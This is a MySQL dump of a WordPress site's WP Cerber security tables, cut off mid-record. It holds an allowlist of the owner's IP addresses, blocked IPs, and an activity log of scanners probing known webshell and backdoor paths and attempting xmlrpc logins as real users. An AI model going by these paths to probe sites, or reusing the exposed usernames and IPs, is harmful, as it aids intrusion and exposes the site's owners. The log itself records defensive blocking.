-- MySQL dump 10.19  Distrib 10.3.38-MariaDB, for Linux (x86_64)
--
-- Host: localhost    Database: corrid11_wp709
-- ------------------------------------------------------
-- Server version	10.3.38-MariaDB-log

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `cerber_acl`
--

DROP TABLE IF EXISTS `cerber_acl`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_acl` (
  `ip` varchar(81) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `ip_long_begin` bigint(20) unsigned NOT NULL DEFAULT 0,
  `ip_long_end` bigint(20) unsigned NOT NULL DEFAULT 0,
  `tag` char(1) NOT NULL,
  `comments` varchar(250) NOT NULL,
  `acl_slice` smallint(5) unsigned NOT NULL DEFAULT 0,
  `ver6` smallint(5) unsigned NOT NULL DEFAULT 0,
  `v6range` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `req_uri` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  KEY `main_for_selects` (`acl_slice`,`ver6`,`ip_long_begin`,`ip_long_end`,`tag`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_acl`
--

LOCK TABLES `cerber_acl` WRITE;
/*!40000 ALTER TABLE `cerber_acl` DISABLE KEYS */;
INSERT INTO `cerber_acl` VALUES ('108.167.56.152',1822898328,1822898328,'W','My IP address',0,0,'',''),('67.198.116.43',1137079339,1137079339,'W','My IP address',0,0,'','');
/*!40000 ALTER TABLE `cerber_acl` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_blocks`
--

DROP TABLE IF EXISTS `cerber_blocks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_blocks` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `block_until` bigint(20) unsigned NOT NULL,
  `reason` varchar(250) NOT NULL,
  `reason_id` int(11) unsigned NOT NULL DEFAULT 0,
  UNIQUE KEY `ip` (`ip`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_blocks`
--

LOCK TABLES `cerber_blocks` WRITE;
/*!40000 ALTER TABLE `cerber_blocks` DISABLE KEYS */;
INSERT INTO `cerber_blocks` VALUES ('45.61.188.109',1681926454,'Limit on login attempts is reached',701),('47.243.171.230',1681926300,'Limit on login attempts is reached',701),('205.185.124.254',1681925101,'Limit on login attempts is reached',701),('209.141.61.84',1681925378,'Limit on login attempts is reached',701);
/*!40000 ALTER TABLE `cerber_blocks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_countries`
--

DROP TABLE IF EXISTS `cerber_countries`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_countries` (
  `country` char(3) NOT NULL DEFAULT '' COMMENT 'Country code',
  `locale` char(10) NOT NULL DEFAULT '' COMMENT 'Locale i18n',
  `country_name` varchar(250) NOT NULL DEFAULT '',
  PRIMARY KEY (`country`,`locale`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_countries`
--

LOCK TABLES `cerber_countries` WRITE;
/*!40000 ALTER TABLE `cerber_countries` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_countries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_lab`
--

DROP TABLE IF EXISTS `cerber_lab`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_lab` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `reason_id` int(11) unsigned NOT NULL DEFAULT 0,
  `stamp` bigint(20) unsigned NOT NULL,
  `details` text NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_lab`
--

LOCK TABLES `cerber_lab` WRITE;
/*!40000 ALTER TABLE `cerber_lab` DISABLE KEYS */;
INSERT INTO `cerber_lab` VALUES ('52.35.72.129',55,1681924765,'a:1:{s:3:\"uri\";s:9:\"/info.php\";}');
/*!40000 ALTER TABLE `cerber_lab` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_lab_ip`
--

DROP TABLE IF EXISTS `cerber_lab_ip`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_lab_ip` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `reputation` int(11) unsigned NOT NULL,
  `expires` int(11) unsigned NOT NULL,
  PRIMARY KEY (`ip`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_lab_ip`
--

LOCK TABLES `cerber_lab_ip` WRITE;
/*!40000 ALTER TABLE `cerber_lab_ip` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_lab_ip` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_lab_net`
--

DROP TABLE IF EXISTS `cerber_lab_net`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_lab_net` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `ip_long_begin` bigint(20) unsigned NOT NULL DEFAULT 0,
  `ip_long_end` bigint(20) unsigned NOT NULL DEFAULT 0,
  `country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `expires` int(11) unsigned NOT NULL DEFAULT 0,
  PRIMARY KEY (`ip`),
  UNIQUE KEY `begin_end` (`ip_long_begin`,`ip_long_end`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_lab_net`
--

LOCK TABLES `cerber_lab_net` WRITE;
/*!40000 ALTER TABLE `cerber_lab_net` DISABLE KEYS */;
/*!40000 ALTER TABLE `cerber_lab_net` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `cerber_log`
--

DROP TABLE IF EXISTS `cerber_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `cerber_log` (
  `ip` varchar(39) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `ip_long` bigint(20) unsigned NOT NULL DEFAULT 0,
  `user_login` varchar(60) NOT NULL,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `stamp` decimal(14,4) NOT NULL,
  `activity` int(10) unsigned NOT NULL DEFAULT 0,
  `session_id` char(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `country` char(3) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `details` varchar(250) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '',
  `ac_bot` int(10) unsigned NOT NULL DEFAULT 0,
  `ac_status` int(10) unsigned NOT NULL DEFAULT 0,
  `ac_by_user` bigint(20) unsigned NOT NULL DEFAULT 0,
  KEY `ip` (`ip`),
  KEY `ip_long` (`ip_long`),
  KEY `session_index` (`session_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `cerber_log`
--

LOCK TABLES `cerber_log` WRITE;
/*!40000 ALTER TABLE `cerber_log` DISABLE KEYS */;
INSERT INTO `cerber_log` VALUES ('40.80.83.88',676352856,'',0,1680107369.2720,10,'XPN4DMTEoI9RznyevsAdwVb3','','707|0|0|0|cmdev-site1.com/wp-plain.php',0,707,0),('40.80.83.88',676352856,'',0,1680107372.3444,100,'9icQt06ePwEFuN7HAIj2TyCa','','13|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,13,0),('40.80.83.88',676352856,'',0,1680107369.2699,55,'XPN4DMTEoI9RznyevsAdwVb3','','19|0|0|0|cmdev-site1.com/wp-plain.php',0,19,0),('40.80.83.88',676352856,'',0,1680107369.2403,55,'Um4I3jMxlEP0qnXakpCW8idA','','19|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,19,0),('165.232.168.48',2783488048,'',0,1680100086.6304,55,'nLN3rM2JvDqzlIgWxt9pOQK8','','19|0|0|0|cmdev-site1.com/administrator/index.php',0,19,0),('79.110.62.85',1332624981,'',0,1680112044.0715,10,'AqGLUH3TFaMwCvXzt91o5hOl','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('79.110.62.85',1332624981,'techspt',0,1680112044.0690,152,'AqGLUH3TFaMwCvXzt91o5hOl','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('79.110.62.85',1332624981,'melissa',0,1680112042.0243,152,'iQm5n3Cu8jrJNqlyDYpE1h0z','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('165.232.168.48',2783488048,'',0,1680137272.7558,55,'PXjKnkrATFGc9C02bufoQH7l','','19|0|0|0|cmdev-site1.com/wp-content/plugins/wordpresss3cll/up.php',0,19,0),('165.232.168.48',2783488048,'',0,1680137271.5556,10,'Z5EzBgW3TwViIPxnC1978slD','','707|0|0|0|cmdev-site1.com/wp-content/plugins/TOPXOH/wDR.php',0,707,0),('165.232.168.48',2783488048,'',0,1680137271.5511,55,'Z5EzBgW3TwViIPxnC1978slD','','19|0|0|0|cmdev-site1.com/wp-content/plugins/TOPXOH/wDR.php',0,19,0),('194.38.23.179',3257276339,'',0,1680124471.7443,55,'lEbTXU3jp1Mi7ymVrZ0v5qOf','','19|0|0|0|cmdev-site1.com/assets/jQuery-File-Upload/server/php/index.php',0,19,0),('165.232.168.48',2783488048,'',0,1680137269.3857,55,'OvSojWwE21XUrxcmTnh0eKVG','','19|0|0|0|cmdev-site1.com/wp-content/plugins/anttt/simple.php',0,19,0),('5.62.58.233',87964393,'',0,1680195001.7074,55,'ihwcByX8lYKJvpIOjUxbNTz6','','19|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,19,0),('167.71.192.36',2806497316,'',0,1680187160.7985,55,'b0fDgKlHSjGWNEoVwkMnJFa8','','19|0|0|0|cmdev-site1.com/administrator/index.php',0,19,0),('165.232.168.48',2783488048,'',0,1680186950.8218,55,'c37uUAiTFrlyzCt1bD64R2n8','','19|0|0|0|cmdev-site1.com/oldsite/wp-admin/install.php',0,19,0),('165.232.168.48',2783488048,'',0,1680186949.1826,55,'iEpBMjx2GqeZr6F3WL1N9nXh','','19|0|0|0|cmdev-site1.com/site/wp-admin/install.php',0,19,0),('165.232.168.48',2783488048,'',0,1680186948.2773,55,'amP8NbRh5HxSq4UIFYu1TQcg','','19|0|0|0|cmdev-site1.com/backup/wp-admin/install.php',0,19,0),('165.232.168.48',2783488048,'',0,1680186947.4129,55,'Yn04jtdb39eMvhQAyCEqi5PI','','19|0|0|0|cmdev-site1.com/web/wp-admin/install.php',0,19,0),('165.232.168.48',2783488048,'',0,1680186946.5183,55,'XeWEhOuRPMorIaiqfC6Q8bD2','','19|0|0|0|cmdev-site1.com/cms/wp-admin/install.php',0,19,0),('165.232.168.48',2783488048,'',0,1680186945.6908,55,'LnEVafIvYypkeQMmgK3ZT82l','','19|0|0|0|cmdev-site1.com/blog/wp-admin/install.php',0,19,0),('165.232.168.48',2783488048,'',0,1680186944.8250,55,'14CQrGXmfo5ejF8kSgbLRuay','','19|0|0|0|cmdev-site1.com/test/wp-admin/install.php',0,19,0),('165.232.168.48',2783488048,'',0,1680186943.9901,55,'086SYfLDGaKMwC3OeZgmnAcI','','19|0|0|0|cmdev-site1.com/wordpress/wp-admin/install.php',0,19,0),('165.232.168.48',2783488048,'',0,1680186943.0904,55,'w2REV41AtXnWxoLsmZqaBCyN','','19|0|0|0|cmdev-site1.com/old/wp-admin/install.php',0,19,0),('165.232.168.48',2783488048,'',0,1680186942.2057,10,'65H8OtMySXTLD9jCiZqlza1f','','707|0|0|0|cmdev-site1.com/new/wp-admin/install.php',0,707,0),('165.232.168.48',2783488048,'',0,1680186942.2035,55,'65H8OtMySXTLD9jCiZqlza1f','','19|0|0|0|cmdev-site1.com/new/wp-admin/install.php',0,19,0),('165.232.168.48',2783488048,'',0,1680186940.6082,55,'DzAMNWSbfiT4xrZQ0KnvXh8B','','19|0|0|0|cmdev-site1.com/wp/wp-admin/install.php',0,19,0),('185.129.248.170',3112302762,'',0,1680213379.8507,55,'CsdOtAD2EZPbK9BjUG68zawv','','19|0|0|0|cmdev-site1.com/wp-includes/certificates/class_api.php',0,19,0),('185.129.248.170',3112302762,'',0,1680213358.2791,55,'eQoHx80fcXDNWhqA2OLtEVCa','','19|0|0|0|cmdev-site1.com/wp-content/plugins/w0rdpr3ssnew/class.api.php',0,19,0),('194.38.23.179',3257276339,'',0,1680261435.0683,55,'98Q01KZW7dJvYsXejVmfauTB','','19|0|0|0|cmdev-site1.com/assets/plugins/jQuery-File-Upload/server/php/index.php',0,19,0),('194.87.151.73',3260520265,'',0,1680303005.1675,55,'h4atspm0gSuqfR3MQ2HUzoD6','','19|0|0|0|cmdev-site1.com/wp-content/themes/seotheme/db.php',0,19,0),('147.78.47.249',2471374841,'',0,1680297563.3553,55,'cLQKeY7UzwIDRqdC9vkJahui','','19|0|0|0|cmdev-site1.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',0,19,0),('178.128.126.187',2994765499,'',0,1680297255.2417,10,'nzpFOoqtg3kiRxMGJCSs2jyV','','707|0|0|0|cmdev-site1.com/wp-admin/theme.php',0,707,0),('194.87.151.73',3260520265,'',0,1680296193.4780,55,'CZS1eFQdyn6uIc5jNlRW2saD','','19|0|0|0|cmdev-site1.com/wp-content/plugins/seoox/alfa-rex.php',0,19,0),('194.87.151.73',3260520265,'',0,1680292718.6840,55,'bwDXsmPdp4OKZRi9fHNtJAvC','','19|0|0|0|cmdev-site1.com/wp-content/plugins/ioptimization/IOptimize.php',0,19,0),('212.142.140.81',3566111825,'',0,1680290592.6400,10,'0jKiomBCTZOqusXRFI35Vbd8','','707|0|0|0|cmdev-site1.com/wp-content/plugins/core-fork/index.php',0,707,0),('212.142.140.81',3566111825,'',0,1680290592.5826,55,'0jKiomBCTZOqusXRFI35Vbd8','','19|0|0|0|cmdev-site1.com/wp-content/plugins/core-fork/index.php',0,19,0),('212.142.140.81',3566111825,'',0,1680290558.2842,55,'Kdb9xBuIfSCwFJtToNGjnAD7','','19|0|0|0|cmdev-site1.com/wp-content/plugins/core-stab/index.php',0,19,0),('165.232.164.241',2783487217,'',0,1680290292.6934,55,'f3gQUhPXvdnJzkCm91TOpHo4','','19|0|0|0|cmdev-site1.com/administrator/index.php',0,19,0),('178.128.126.187',2994765499,'',0,1680297255.2395,55,'nzpFOoqtg3kiRxMGJCSs2jyV','','19|0|0|0|cmdev-site1.com/wp-admin/theme.php',0,19,0),('178.128.126.187',2994765499,'',0,1680297231.3438,55,'qRTib2K0E16pehGjIVfMDnOQ','','19|0|0|0|cmdev-site1.com/wp-content/plugins/task-controller/index.php',0,19,0),('194.87.151.73',3260520265,'',0,1680302997.0680,55,'Iq8veF2T9noGD4VbWm6M0BAP','','19|0|0|0|cmdev-site1.com/wp-content/themes/pridmag/db.php',0,19,0),('194.87.151.73',3260520265,'',0,1680310598.1397,55,'cmCWjrKH9Ovqe84yV5XAuJi1','','19|0|0|0|cmdev-site1.com/wp-content/plugins/wordpresss3cll/up.php',0,19,0),('194.87.151.73',3260520265,'',0,1680310590.1747,10,'YRuKcQ9Bxl8rOi4JdH6vqhL5','','707|0|0|0|cmdev-site1.com/wp-content/plugins/TOPXOH/wDR.php',0,707,0),('194.87.151.73',3260520265,'',0,1680310590.1702,55,'YRuKcQ9Bxl8rOi4JdH6vqhL5','','19|0|0|0|cmdev-site1.com/wp-content/plugins/TOPXOH/wDR.php',0,19,0),('194.87.151.73',3260520265,'',0,1680310574.4464,55,'Wp4kF8BQuw5xLvJGAf9XUeOl','','19|0|0|0|cmdev-site1.com/wp-content/plugins/anttt/simple.php',0,19,0),('165.232.164.241',2783487217,'',0,1680331711.5325,55,'9Tva6rUIN0Jq8E42dXjs3fg5','','19|0|0|0|cmdev-site1.com/web/wp-admin/install.php',0,19,0),('165.232.164.241',2783487217,'',0,1680331710.6230,55,'icCJ5L3shRTolj9nDrX4ZxWF','','19|0|0|0|cmdev-site1.com/cms/wp-admin/install.php',0,19,0),('165.232.164.241',2783487217,'',0,1680331709.7588,55,'Z8uTDmMLgbtE6O5Vk3zos9iG','','19|0|0|0|cmdev-site1.com/blog/wp-admin/install.php',0,19,0),('165.232.164.241',2783487217,'',0,1680331708.9289,55,'xVjzZam3hDWdLYnt9bXGIrF5','','19|0|0|0|cmdev-site1.com/test/wp-admin/install.php',0,19,0),('165.232.164.241',2783487217,'',0,1680331708.0873,55,'BM4bF1LfzKI5RsDgq3moPApl','','19|0|0|0|cmdev-site1.com/wordpress/wp-admin/install.php',0,19,0),('165.232.164.241',2783487217,'',0,1680331707.2671,55,'YwOoqCDbmzLnM9AyPr0p1kth','','19|0|0|0|cmdev-site1.com/old/wp-admin/install.php',0,19,0),('165.232.164.241',2783487217,'',0,1680331705.9120,10,'dZM0kBSFqxbjHX9vrEcz5eI3','','707|0|0|0|cmdev-site1.com/new/wp-admin/install.php',0,707,0),('165.232.164.241',2783487217,'',0,1680331705.9092,55,'dZM0kBSFqxbjHX9vrEcz5eI3','','19|0|0|0|cmdev-site1.com/new/wp-admin/install.php',0,19,0),('165.232.164.241',2783487217,'',0,1680331704.2298,55,'GcK6aFuBX9APMbo8vQwUyfV1','','19|0|0|0|cmdev-site1.com/wp/wp-admin/install.php',0,19,0),('165.232.164.241',2783487217,'',0,1680331715.8321,55,'dV5e0UIPhs2Sx6Qcq9vbKJ8l','','19|0|0|0|cmdev-site1.com/oldsite/wp-admin/install.php',0,19,0),('194.87.151.73',3260520265,'',0,1680343925.3375,55,'EPOJswygn8qtuRBFZifGCjQM','','19|0|0|0|cmdev-site1.com/wp-includes/images/about.php',0,19,0),('194.87.151.73',3260520265,'',0,1680343920.8587,55,'E7CKe3v8xjzRYB1goly9hMIX','','19|0|0|0|cmdev-site1.com/wp-content/languages/plugins/about.php',0,19,0),('194.87.151.73',3260520265,'',0,1680343911.6950,55,'gmc8hueOtZpF40HnRJEkYN2j','','19|0|0|0|cmdev-site1.com/images/about.php',0,19,0),('194.87.151.73',3260520265,'',0,1680343908.2885,55,'fD8LK97eA5O6hUoswqjPZtpV','','19|0|0|0|cmdev-site1.com/css/about.php',0,19,0),('194.87.151.73',3260520265,'',0,1680343899.6400,10,'94eRC3IPpEyTBwV7YqXz80vr','','707|0|0|0|cmdev-site1.com/wp-includes/about.php',0,707,0),('194.87.151.73',3260520265,'',0,1680343899.6373,55,'94eRC3IPpEyTBwV7YqXz80vr','','19|0|0|0|cmdev-site1.com/wp-includes/about.php',0,19,0),('194.87.151.73',3260520265,'',0,1680343889.7038,55,'nCP1eSr6gNBA2yE7HzkR48XI','','19|0|0|0|cmdev-site1.com/wp-admin/includes/about.php',0,19,0),('165.232.164.241',2783487217,'',0,1680388847.3394,55,'zLpWqdSlKr1u0G9NxRV8QHeJ','','19|0|0|0|cmdev-site1.com//wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php',0,19,0),('194.87.151.73',3260520265,'',0,1680372348.3270,10,'cuBztXjfapN7yEDYrOSLwvds','','707|0|0|0|cmdev-site1.com/wp-admin/css/colors/blue/uploader.php',0,707,0),('194.87.151.73',3260520265,'',0,1680372348.3231,55,'cuBztXjfapN7yEDYrOSLwvds','','19|0|0|0|cmdev-site1.com/wp-admin/css/colors/blue/uploader.php',0,19,0),('194.87.151.73',3260520265,'',0,1680370827.4841,55,'wq3hVbEtrpxTIiFn9aBJ625O','','19|0|0|0|cmdev-site1.com/wp-content/themes/ccx/index.php',0,19,0),('194.38.23.179',3257276339,'',0,1680379054.4315,55,'m1gziQZv7C8KjPknqyOD2TJL','','19|0|0|0|cmdev-site1.com/plugins/jQuery-File-Upload/server/php/index.php',0,19,0),('159.223.49.95',2682204511,'',0,1680378060.3819,55,'t741n6mwLDkPY0pjvZNlH2TU','','19|0|0|0|cmdev-site1.com/administrator/index.php',0,19,0),('95.164.157.188',1604623804,'',0,1680376691.8646,55,'m3sMPQ6dy2BF9Tt8LZcAWVje','','19|0|0|0|cmdev-site1.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',0,19,0),('165.232.164.241',2783487217,'',0,1680388846.5077,55,'yF6vuJYgLZ5BmEKiox1NUfWG','','19|0|0|0|cmdev-site1.com//wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',0,19,0),('165.232.164.241',2783487217,'',0,1680388845.6909,55,'j4gHRWnN9cLKopkFE0u3swYd','','19|0|0|0|cmdev-site1.com//wp-content/king.php',0,19,0),('165.232.164.241',2783487217,'',0,1680388844.8773,18,'BdGgJ0zVPpU59KZ6rluEQ7XT','','13|0|0|0|cmdev-site1.com//wp-content/x.php',0,13,0),('165.232.164.241',2783487217,'',0,1680388843.6996,55,'FtYpQH8vLs6Ou0rVzJMwkeR1','','19|0|0|0|cmdev-site1.com//abruzi.php4',0,19,0),('165.232.164.241',2783487217,'',0,1680388841.7590,55,'gRz3CDHsGPmOJxwht4lZLejK','','19|0|0|0|cmdev-site1.com//wp-content/uploads/typehub/custom/a57bze8931/.__a57bze8931.php',0,19,0),('165.232.164.241',2783487217,'',0,1680388839.7799,55,'hpwcjmtkC6VdERYLMlSZI21Q','','19|0|0|0|cmdev-site1.com//wp-content/plugins/apikey/a57bze8931.php',0,19,0),('165.232.164.241',2783487217,'',0,1680388838.9382,18,'0Zu5IfJlUC1zBSF3MPkytObi','','13|0|0|0|cmdev-site1.com//wp-content/plugins/apikey/apikey.php',0,13,0),('165.232.164.241',2783487217,'',0,1680388838.0758,55,'9LobJRr1ljHuaGOKdm6gwU8e','','19|0|0|0|cmdev-site1.com//wp-content/uploads/kaswara/fonts_icon/a57bze8931/.__a57bze8931.php',0,19,0),('159.223.49.95',2682204511,'',0,1680410498.2779,55,'N4vfnqJpXSrhO6gjuyKcIdQt','','19|0|0|0|cmdev-site1.com/wordpress/wp-admin/install.php',0,19,0),('159.223.49.95',2682204511,'',0,1680410497.3889,55,'5JpugjaZCci9m2LNH4FfvxzY','','19|0|0|0|cmdev-site1.com/old/wp-admin/install.php',0,19,0),('159.223.49.95',2682204511,'',0,1680410496.5251,10,'RDCdI2Tn4PUJEiql7HzQrpFY','','707|0|0|0|cmdev-site1.com/new/wp-admin/install.php',0,707,0),('159.223.49.95',2682204511,'',0,1680410496.5215,55,'RDCdI2Tn4PUJEiql7HzQrpFY','','19|0|0|0|cmdev-site1.com/new/wp-admin/install.php',0,19,0),('159.223.49.95',2682204511,'',0,1680410495.6007,55,'jGkui8rMdQqogt5TBYSO1XV0','','19|0|0|0|cmdev-site1.com/wp/wp-admin/install.php',0,19,0),('165.232.164.241',2783487217,'',0,1680416824.2638,55,'d6nkotgJ7Zzj3PlxK4SqQfrR','','19|0|0|0|cmdev-site1.com/old/wp-admin/install.php',0,19,0),('165.232.164.241',2783487217,'',0,1680416823.3440,55,'zt9QUlCEGdeDcv2PFaO0yArs','','19|0|0|0|cmdev-site1.com/new/wp-admin/install.php',0,19,0),('165.232.164.241',2783487217,'',0,1680416822.3798,55,'3SEmQl5czI6tYsZLJ8uwgGpF','','19|0|0|0|cmdev-site1.com/wp/wp-admin/install.php',0,19,0),('79.110.62.85',1332624981,'',0,1680415262.1546,10,'sgeXBVt2h5CzFAOY1qrkcyZS','','701|0|0|0|cmdev-site1.com/xmlrpc.php',0,701,0),('79.110.62.85',1332624981,'techspt',0,1680415262.1478,152,'sgeXBVt2h5CzFAOY1qrkcyZS','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('79.110.62.85',1332624981,'melissa',0,1680415259.7911,152,'KIqj3ZRLJQwrD9iX2zVvUHcY','','0|0|0|0|cmdev-site1.com/xmlrpc.php',0,0,0),('66.115.146.176',1114870448,'',0,1680428552.1392,55,'HdBSuEcY3P0A8UrN4RsLl1mk','','19|0|0|0|cmdev-site1.com//wp-content/plugins/ccx/index.php',0,19,0),('66.115.146.176',1114870448,'',0,1680428551.4581,100,'y3wHDor6AkcXZiVGRPWYhuge','','13|0|0|0|cmdev-site1.com//wp-content/themes/seotheme/db.php',0,13,0),('66.115.146.176',1114870448,'',0,1680428550.2383,100,'BbyWdJ6XLIxgoekqRjfH42PK','','13|0|0|0|cmdev-site1.com//wp-content/themes/seoplugins/db.php',0,13,0),('66.115.146.176',1114870448,'',0,1680428549.4777,100,'tWINAb5e7oTYgjKdsEXw0mcU','','13|0|0|0|cmdev-site1.com//wp-content/themes/pridmag/db.php',0,13,0),('66.115.146.176',1114870448,'',0,1680428548.7726,100,'mrEfgI4WaKL7NBkHVG32D6lw','','13|0|0|0|cmdev-site1.com//index.php',0,13,0),('66.115.146.176',1114870448,'',0,1680428548.0731,55,'fB5MJtwAL6NgTbl8o4imRKyS','','19|0|0|0|cmdev-site1.com//wp-content/themes/seotheme/mar.php',0,19,0),('66.115.146.176',1114870448,'',0,1680428544.2657,10,'LGB7qMxEVoc8l36OkX1ZHFWY','','707|0|0|0|cmdev-site1.com//wp-content/plugins/seoplugins/mar.php',0,707,0),('66.115.146.176',1114870448,'',0,1680428544.2629,55,'LGB7qMxEVoc8l36OkX1ZHFWY','','19|0|0|0|cmdev-site1.com//wp-content/plugins/seoplugins/mar.php',0,19,0),('66.115.146.176',1114870448,'',0,1680428542.9627,55,'HxmGIld5Ok8iEzpuWjoN0bt9','','19|0|0|0|cmdev-site1.com//wp-content/plugins/ioptimization/IOptimize.php',0,19,0),('67.198.116.43',1137079339,'Melissa',3,1680439608.4406,5,'WNP8lqiHVZIC2vogpbRwrAfk','','500|0|0|0|cmdev-site1.com/the-wild-hunt/',0,500,3),('67.198.116.43',1137079339,'Melissa',0,1680439600.8411,7,'zphAa56HjmBKN2ZVGnXQMTtY','','40|0|0|0|cmdev-site1.com/wp-admin/admin-ajax.php',0,40,0),('165.232.164.241',2783487217,'',0,1680476014.7973,55,'oyTJ0dLXbQAwzvaiCSUs1cO9','','19|0|0|0|cmdev-site1.com//wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php',0,19,0),('165.232.164.241',2783487217,'',0,1680476013.9538,55,'76kstcJBH8fUuQ45VTFrYSOd','','19|0|0|0|cmdev-site1.com//wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php',0,19,0),('165.232.164.241',2783487217,'',0,1680476013.0796,55,'HJLTuE5cbqy9ozjAUwiWfeOv','','19|0|0|0|cmdev-site1.com//wp-content/king.php',0,19,0),('165.232.164.241',2783487217,'',0,1680476012.2345,18,'UWIDgebucNlrJXE2F3xVSkfw','','13|0|0|0|cmdev-site1.com//wp-content/x.php',0,13,0),('165.232.164.241',2783487217,'',0,1680476011.0093,55,'DTceGk1gd3HVwEL6zP4IAaNv','','19|0|0|0|cmdev-site1.com//abruzi.php4',0,19,0),('165.232.164.241',2783487217,'',0,1680476008.9703,55,'6JNunOmXq4KL0UrMasipeVkw','','19|0|0|0|cmdev-site1.com//wp-content/uploads/typehub/custom/a57bze8931/.__a57bze8931.php',0,19,0),('165.232.164.241',2783487217,'',0,1680476006.9733,55,'UkeV5BbaKtO2HLyZIW79qgJi','','19|0|0|0|cmdev-site1.com//wp-content/plugins/apikey/a57bze8931.php',0,19,0),('165.232.164.241',2783487217,'',0,1680476006.1263,10,'PEiLUYykdu6GaS15K37cx8mI','','707|0|0|0|cmdev-site1.com//wp-content/plugins/apikey/apikey.php',0,707,0),('165.232.164.241',2783487217,'',0,1680476006.1222,56,'PEiLUYykdu6GaS15K37cx8mI','','51|0|0|0|cmdev-site1.com//wp-content/plugins/apikey/apikey.php',0,51,0),('165.232.164.241',2783487217,'',0,1680476005.2671,55,'0eDarMbdTgYZIWBzFpE479k8','','19|0|0|0|cmdev-site1.com//wp-content/uploads/kaswara/fonts_icon/a57bze8931/.__a57bze8931.php',0,19,0),('95.216.148.85',1608029269,'',0,1680475978.1818,10,'5FP19CNsxkfYmU2WK6